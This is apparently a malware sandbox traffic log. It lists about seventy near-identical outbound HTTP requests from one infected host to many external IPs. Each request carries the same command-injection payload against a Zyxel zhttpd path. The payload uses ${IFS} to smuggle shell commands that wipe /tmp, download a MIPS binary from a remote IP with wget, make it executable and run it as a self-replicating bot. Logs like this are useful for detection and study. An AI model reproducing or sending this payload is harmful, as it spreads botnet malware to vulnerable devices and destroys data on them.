                        3174192.168.2.1438292213.55.214.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227350950 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3175192.168.2.1447536151.176.20.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227382898 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3176192.168.2.14584922.224.108.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227416039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3177192.168.2.145366068.205.228.2443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227446079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3178192.168.2.145184682.204.234.83443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227500916 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3179192.168.2.1460062166.111.223.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227560997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3180192.168.2.1444256155.62.127.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227593899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3181192.168.2.1449446195.253.127.21443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227633953 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3182192.168.2.1443890208.118.234.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227667093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3183192.168.2.1437318176.106.181.109443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227721930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3184192.168.2.1442512150.78.0.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227770090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3185192.168.2.144111264.114.153.176443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227788925 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3186192.168.2.1454820136.220.104.47443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227852106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3187192.168.2.143793876.41.183.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227870941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3188192.168.2.145672643.54.217.58443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227930069 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3189192.168.2.1453626197.106.5.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227946997 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3190192.168.2.1454944220.133.15.201443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.227991104 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3191192.168.2.1436068200.41.35.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228024006 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3192192.168.2.143544035.197.57.152443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228077888 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3193192.168.2.145934276.27.85.4443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228106976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3194192.168.2.145774088.174.222.19443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228163958 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3195192.168.2.1452090168.92.229.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228207111 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3196192.168.2.1441112128.141.233.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228236914 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3197192.168.2.1442226112.148.16.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228285074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3198192.168.2.1446700190.209.76.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228307009 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3199192.168.2.1433988196.233.138.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228334904 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3200192.168.2.144255446.239.203.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228359938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3201192.168.2.143511223.122.47.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228419065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3202192.168.2.1453224147.17.110.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228456020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3203192.168.2.1458580151.221.0.144443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228482008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3204192.168.2.1458552204.124.220.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228514910 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3205192.168.2.144602265.115.204.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228549957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3206192.168.2.146073645.165.66.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228589058 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3207192.168.2.145699872.169.48.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228619099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3208192.168.2.1444270213.96.178.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228645086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3209192.168.2.1443972107.16.95.31443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228693008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3210192.168.2.1442170172.186.206.188443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228693008 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3211192.168.2.143377458.216.189.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228728056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3212192.168.2.1452410201.253.50.198443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228780985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3213192.168.2.1459238124.124.76.162443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228802919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3214192.168.2.144497047.4.142.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228821039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3215192.168.2.1460576191.74.204.153443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228847980 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3216192.168.2.1436630107.59.76.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228879929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3217192.168.2.143729684.70.67.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228909016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3218192.168.2.1456992175.254.210.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228929996 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3219192.168.2.1439606115.205.211.134443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228965998 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3220192.168.2.1437604194.229.227.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.228981972 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3221192.168.2.1440378118.217.20.79443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229012966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3222192.168.2.1448768162.193.46.80443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229055882 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3223192.168.2.143521446.5.218.221443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229068995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3224192.168.2.1433304199.202.213.123443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229101896 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3225192.168.2.1434120109.221.175.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229139090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3226192.168.2.144632242.120.175.45443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229166031 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3227192.168.2.1436208194.242.114.82443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229197979 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3228192.168.2.145618471.109.10.86443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229228973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3229192.168.2.144374070.19.201.231443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229271889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3230192.168.2.1453106173.249.37.129443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229296923 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3231192.168.2.144779695.78.160.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229325056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3232192.168.2.1437000175.120.230.49443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229366064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3233192.168.2.145344032.145.117.250443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229384899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3234192.168.2.143965470.194.208.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229439020 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3235192.168.2.1440734150.42.10.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229439974 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3236192.168.2.145981291.25.31.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229489088 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3237192.168.2.143833477.59.117.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229501963 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3238192.168.2.145417073.189.130.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229546070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3239192.168.2.144274434.98.150.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229577065 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3240192.168.2.1436526142.205.143.196443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229609013 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3241192.168.2.1444522175.41.4.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229631901 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3242192.168.2.14456569.51.125.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229662895 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        3243192.168.2.1458742112.126.11.157443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:41.229686975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


